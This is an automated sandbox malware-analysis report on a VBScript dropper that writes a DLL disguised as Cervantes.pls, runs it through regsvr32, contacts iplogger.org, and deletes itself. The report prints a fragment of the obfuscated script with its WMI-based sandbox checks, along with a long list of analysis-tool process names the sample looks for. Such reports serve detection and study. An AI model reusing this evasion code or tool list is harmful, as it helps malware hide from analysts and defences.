Analysis Report files#_56117.vbs

Overview

General Information

Sample Name: files#_56117.vbs
MD5: 147091e61ec59f67ab598d26f15ad0e7
SHA1: 0dd98cc3868b7896b4ebca00e55ec3ce2bdc4118
SHA256: 2591ec56069e41c33309c3042083c047c360c62454d52f734a79be21540c2967

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
May check the online IP address of the machine
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5048 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 1112 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\Cervantes.pls MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4116 cmdline: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started; Author: Florian Roth; Data: Command: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, CommandLine: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, ProcessId: 4116

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cervantes.pls; Avira: detection malicious, Label: HEUR/AGEN.1046090
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cervantes.pls; Virustotal: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\Cervantes.pls; ReversingLabs: Detection: 56%
Multi AV Scanner detection for submitted file
Source: files#_56117.vbs; Virustotal: Detection: 11%
Source: files#_56117.vbs; ReversingLabs: Detection: 16%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cervantes.pls; Joe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Desktop\desktop.ini

Networking:

May check the online IP address of the machine
Source: unknown; DNS query: name: iplogger.org
Source: Joe Sandbox View; IP Address: 88.99.66.31
Source: Joe Sandbox View; JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown; DNS traffic detected: queries for: iplogger.org
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: wscript.exe, 00000000.00000002.1131185440.000001F3B5255000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1131515341.000001F3B53D4000.00000004.00000001.sdmp; String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000002.1131185440.000001F3B5255000.00000004.00000001.sdmp; String found in binary or memory: https://iplogger.org/1
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1131459959.000001F3B52C0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1114998047.000001F3B1A49000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1113737146.000001F3B5274000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1126487835.000001F3B1A40000.00000004.00000040.sdmp; String found in binary or memory: https://iplogger.org/1N3Ei7
Source: wscript.exe, 00000000.00000003.1109748390.000001F3B52C2000.00000004.00000001.sdmp; String found in binary or memory: https://iplogger.org/1N3Ei7s
Source: wscript.exe, 00000000.00000003.1114998047.000001F3B1A49000.00000004.00000001.sdmp; String found in binary or memory: https://iplogger.org/1N3Ei7u
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown; Network traffic detected: HTTP traffic on port 49942 -> 443

System Summary:

Source: files#_56117.vbs; Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exe; Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: sfc.dll
Source: classification engine; Classification label: mal100.troj.evad.winVBS@4/6@1/1
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs'
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\Cervantes.pls
Source: unknown; Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\Cervantes.pls
Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\Cervantes.pls
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Binary string: y:\test4\run4\Debug\run4.pdb source: Cervantes.pls.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe; Anti Malware Scan Interface: WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) ThenExit FunctionEnd IfSet LouisianaService = GetObject("winmgmts:\\.\root\cimv2")Set burbanklItems = LouisianaService.ExecQuery("Select * from Win32_LogicalDisk")For Each LCVPVzmFYoATz In burbanklItems' pont. flag lab granite proper Harcourt rutile dwarves. prospect biscuit depend adjacent farfetched anise gaggle sashay whig whereof lacquer. blocky greensward epistle tagWRLpxzbdZ = tagWRLpxzbdZ + Int(LCVPVzmFYoATz.Size / ((1073742868 - (950 - 2.0)) - (75 + 21.0)))NextIf tagWRLpxzbdZ < ((70 + ((87 - 3.0) + 285.0)) - 379.0) ThenPAnMjKKlKawcyHNEnd If' oriole mendacious perpetuate symmetry curfew, gotten Arlene Segundo hall radioactive revving, Purcell eleventh lenticular End FunctionFunction UWbEE()REM auction saddlebag chamois poi wrath Copenhagen twentyfold cubbyhole earmark hymn hypothermia endomorphism coagulable on error resume nextIf (InStr(WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) ThenExit FunctionEnd Ifcontrolled = Array("catheter newsletter supple plaid indict groggy permissive clang fanfold. 5436813 vivid lumbago abbe maw glissade550 hyphenate smell Ludwig rhythm chevy299 Gonzales sphagnum proprioception Ramo ")Wellesley = (((40 + 6657.0) - 203.0) - (53 + 6438.0))REM aniline crow censure anatomy Berniece fest Cluj787 Acapulco fernery adulate explicable Gustafson cautious appropriate shun FCC basidiomycetes processor. 
7120026 Bangor farina officialdom mallow tactful latus Hutchinson vaccinate schooner Cyrus rear lithography adjacent238 groat CERN, 8768946 impart wiZSZrk = (((79 + 15.0) + (-16.0)) + (-(61 + 14.0)))If CreateObject("Scripting.FileSystemObject").GetFolder(LHnoyaVcivO).Files.Count < Wellesley ThenPAnMjKKlKawcyHNEnd IfSet glJpk = CreateObject("WScript.Shell")polite = glJpk.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(polite).Files.Count < wiZSZrk ThenPAnMjKKlKawcyHNEnd IfREM tablespoonful chorus Kobayashi lop gallant brisk varnish. pedagogic success expanse ornament archetype, 9928097 classmate monel Koenigsberg mimicry seasonal Norton contravariant hallmark coexist onetime parentheses Davis. 4942457 pounce525, clomp crook dispensable semantic Scorpio poi573. imprint serum, 4354814 datura Auriga broach Achilles concurrent hormonal concertina, Putnam scathing semantic413 worktable, scion sceptic. were Laredo. cabinetry ' telephotography historian pleural hot occipital bout lord diadem determinacy eminent321 loggerhead Himalaya war amnesty osmium rye Spector rootstock Hitachi pronunciation Barnes safe End FunctionFunction zQrVl()Dim iEveXErawdMlYD: Set iEveXErawdMlYD = CreateObject("Scripting.FileSystemObject")Dim EHQphxSk: Set EHQphxSk = CreateObject("Shell.Application")Shelton = Array("downwind longitudinal pawnshop juke sale grief Albrecht parentage. 1561961 mask hoar Garrisonian chamois253 cloak meridional scrooge furlough tyke awoke Macadamia Perseus boxcar Shaffer pioneer, f
Source: Cervantes.pls.0.dr; Static PE information: section name: .textbss

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\Cervantes.pls

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\System32\wscript.exe; File deleted: c:\users\user\desktop\files#_56117.vbs
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000002.1126093818.000001F3B193D000.00000004.00000001.sdmp; Binary or memory string: CKER.EXE","SYSANALYZER.EXE","AVZ.EXE","IDAQ.EXE","PROCESSMEMDUMP.EXE","SYSER.EXE","BEHAVIORDUMPER.EXE","IMMUNITYDEBUGGER.EXE","PROCEXP.EXE","SYSTEMEXPLORER.EXE","BINDIFF.EXE","IMPORTREC.EXE","PROCEXP64.EXE","SYSTEMEXPLORERSERVICE.EXE","BTPTRAYICON.EXE","IMUL.EXE","PROC
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: SYSER.EXE=
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.1122382392.000001F3B4E10000.00000004.00000001.sdmp; Binary or memory string: ESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: FORTITRACER.EXEA
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 4176; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe; File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe; File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.1109581659.000001F3B53E5000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#P
Source: wscript.exe, 00000000.00000003.1113893693.000001F3B528C000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.1114180133.000001F3B53E6000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW@
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe; File created: Cervantes.pls.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe; Network Connect: 88.99.66.31 187

Source: C:\Windows\System32\wscript.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmp; Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmp; Binary or memory string: regshot.exe

Mitre Att&ck Matrix

  • Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment
  • Execution: Windows Management Instrumentation 221, Scripting 121, Exploitation for Client Execution 1, Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting
  • Persistence: Winlogon Helper DLL, Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception
  • Privilege Escalation: Process Injection 11, Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task
  • Defense Evasion: Masquerading 1, Virtualization/Sandbox Evasion 3, Process Injection 11, Scripting 121, File Deletion 1, Obfuscated Files or Information 1, DLL Side-Loading 1
  • Credential Access: Credential Dumping, Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception
  • Discovery: Virtualization/Sandbox Evasion 3, Security Software Discovery 331, Remote System Discovery 1, System Network Configuration Discovery 1, File and Directory Discovery 2, System Information Discovery 24, Network Sniffing
  • Lateral Movement: Application Deployment Software, Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash
  • Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection
  • Exfiltration: Data Compressed, Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel
  • Command and Control: Standard Cryptographic Protocol 2, Standard Non-Application Layer Protocol 1, Standard Application Layer Protocol 2, Multiband Communication, Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

Behavior Graph

Screenshots